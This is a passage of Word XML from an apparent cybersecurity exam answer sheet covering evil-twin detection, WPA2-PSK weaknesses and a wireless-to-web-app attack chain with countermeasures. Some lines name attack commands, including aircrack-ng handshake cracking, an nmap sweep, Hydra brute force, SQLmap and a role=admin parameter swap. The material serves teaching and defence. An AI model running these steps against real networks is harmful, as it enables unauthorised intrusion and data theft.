      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Captures beacon frames and lists all APs and connected clients (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>airodump-ng wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t>); two entries with the identical SSID but different BSSIDs/channels is the signature of an Evil Twin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13236BA5" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Aireplay-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Used defensively/in testing to simulate the same deauthentication behaviour the attacker used, helping the security team reproduce and confirm the vulnerability in a controlled test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E54C7E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Deep packet inspection of captured traffic (.pcap from airodump-ng) reveals duplicate BSSIDs, abnormal beacon intervals, ARP anomalies, and any captured plaintext credentials, providing forensic proof of the rogue AP and MITM activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4566B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="350"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kismet / Wifite:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Provide continuous wireless IDS-style monitoring to flag new/unexpected SSIDs and rogue devices automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C63F5C7" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4. Weaknesses in the Existing Wireless Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8A1E5" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>WPA2-PSK uses one static, shared passphrase for the entire organisation – it authenticates the password, not the device or the specific access point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC7966C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>802.11 management frames (including SSID broadcasts and, pre-WPA3, deauthentication frames) are unauthenticated, allowing spoofed APs and forced-deauth attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E28AF9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>No wireless intrusion detection/prevention system (WIDS/WIPS) was in place to flag duplicate SSIDs or abnormal beacon activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA2ED9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>No employee awareness training on verifying network identity or avoiding captive portals requesting credentials on a Wi-Fi splash page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E4241B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="349"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>No 802.1X/RADIUS-based enterprise authentication, so there is no way to verify the AP presents a trusted certificate before a client associates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A0183" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>5. Recommended Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328F965" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Upgrade to WPA2/WPA3-Enterprise (802.1X + RADIUS + EAP-TLS):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Requires certificate-based mutual authentication so rogue APs cannot be trusted by clients, and gives each user unique credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F48CBB" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enable Management Frame Protection (802.11w) / migrate to WPA3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cryptographically protects deauthentication and disassociation frames, defeating the forced-disconnect technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7B123" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deploy a WIDS/WIPS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Continuously scans for rogue/duplicate SSIDs and automatically alerts or contains them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E33EF7" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Network Monitoring &amp; Logging:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Correlate wireless authentication logs with a SIEM to detect anomalous connection patterns in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF36CDC" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>User Awareness Training:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Teach staff to verify certificate warnings, avoid entering credentials on unexpected captive portals, and report unusual login prompts immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A430AE" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Use of VPN for Sensitive Access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Even if a device joins a rogue AP, an always-on corporate VPN ensures traffic remains encrypted end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC4752" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="275"/>
      </w:pPr>
      <w:r>
        <w:t>Question 4: Full Penetration Test: Wireless Compromise to Web Application Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D78F2E7" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="B03030"/>
        </w:rPr>
        <w:t>(Marks: 20 — Understanding of Case: 5, Application of Concepts: 5, Analysis: 4, Solution Design: 4, Clarity: 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B40CB" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="252" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Case Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> An organization's internal employee management system is accessible over Wi-Fi. The wireless network uses weak passwords, and the web application lacks proper authentication and session management. An attacker gains Wi-Fi access, performs reconnaissance, and exploits the web application to escalate privileges and access confidential employee data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC15A0E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Understanding of the Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA8884E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="223"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This scenario is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>compound attack chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that moves laterally from the wireless layer into the application layer, showing why defense-in-depth matters: a single weak control (an easily cracked Wi-Fi password) removes the network perimeter entirely, after which a second weak control (poor authentication/session management in the web app) allows privilege escalation to confidential HR data. Each phase compounds the previous one, so the assessment must analyse the full kill-chain, not each weakness in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81DB2D" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2. The Attack Chain, Phase by Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C201B8" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 1 – Wireless Reconnaissance and Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8EEC7" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Airmon-ng / Airodump-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identify the target SSID, BSSID, channel and connected clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CF061" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aircrack-ng / Hashcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> perform a dictionary or brute-force attack on the captured WPA2 4-way handshake (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>aircrack-ng -w wordlist.txt capture.cap</w:t>
      </w:r>
      <w:r>
        <w:t>) to recover the weak pre-shared key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E99E5" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="294" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Once connected, the attacker has the same network position as a trusted employee device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02CC2C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="91"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2 – Internal Network Reconnaissance / Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F6FB4" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap -sV -sC 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:t>) discovers live hosts, the employee-management web server, and its open ports/services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D1D50" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nikto / OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scan the discovered web application for missing security headers, outdated components and weak authentication endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A667F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Netdiscover / ARP-scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> map the internal LAN topology to identify additional targets (file servers, database servers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EAE736" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3 – Web Application Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4CAA0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> intercepts login/session traffic; testing reveals predictable or non-expiring session tokens and missing account-lockout controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE24F4" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> brute-forces weak employee credentials against the login form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C93C3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tests input fields for injection to bypass authentication or dump the employee database directly if present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D61A1" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used if any server-side component (CMS/plugin) has a known exploitable vulnerability for remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58472365" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4 – Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25C597" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="275"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">● </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Session/cookie manipulation (e.g. changing a predictable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>role=employee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>role=admin</w:t>
      </w:r>
      <w:r>
        <w:t>) exploits broken access control to gain administrative rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019FAEA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="354"/>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With RCE (if achieved), post-exploitation tools such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LinPEAS/WinPEAS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Metasploit's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identify OS-level privilege-escalation paths to gain full server control and access the confidential employee data store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB9A4E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="152"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Comprehensive Defense-in-Depth Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B7E1F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Wireless Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C258A9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce strong, complex Wi-Fi passphrases or migrate to WPA2/WPA3-Enterprise with 802.1X/RADIUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D0065C" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Segment wireless traffic from critical servers using VLANs and a dedicated guest network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190F5C1" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="294" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy WIDS/WIPS for rogue-device and brute-force detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130AA2F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Network Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD81F9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Apply network segmentation and firewall rules so the employee-management server is not reachable from general Wi-Fi without additional authentication (e.g. VPN/jump host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32701070" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="294" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Use IDS/IPS and centralized logging (SIEM) to detect internal scanning and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10337082" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Application Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FDA35" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Implement strong authentication (MFA), account lockout, and secure, expiring, server-validated session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12F8D2" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce role-based access control (RBAC) validated server-side on every request – never trust client-supplied role/permission values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E07AC3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="239"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Apply secure coding practices (input validation, parameterized queries, output encoding) and patch management for all application components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D26907" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2113F162" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct regular, scheduled penetration tests and vulnerability scans covering both wireless and web layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15200D27" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="76" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Provide security awareness training and enforce a strong password policy across the organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A54EC3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Maintain an incident response plan so chained attacks like this are detected and contained quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB4E28" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="275"/>
      </w:pPr>
      <w:r>
        <w:t>Question 5: Deauthentication Attacks Causing Wi-Fi Disruption on a University Campus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03821AAB" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="B03030"/>
        </w:rPr>
        <w:t>(Marks: 20 — Understanding of Case: 5, Application of Concepts: 5, Analysis: 4, Solution Design: 4, Clarity: 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3145C633" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Case Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> A university campus experiences frequent Wi-Fi disruptions during peak hours. Investigation reveals repeated deauthentication attacks targeting access points, causing legitimate users to disconnect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD14F38" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
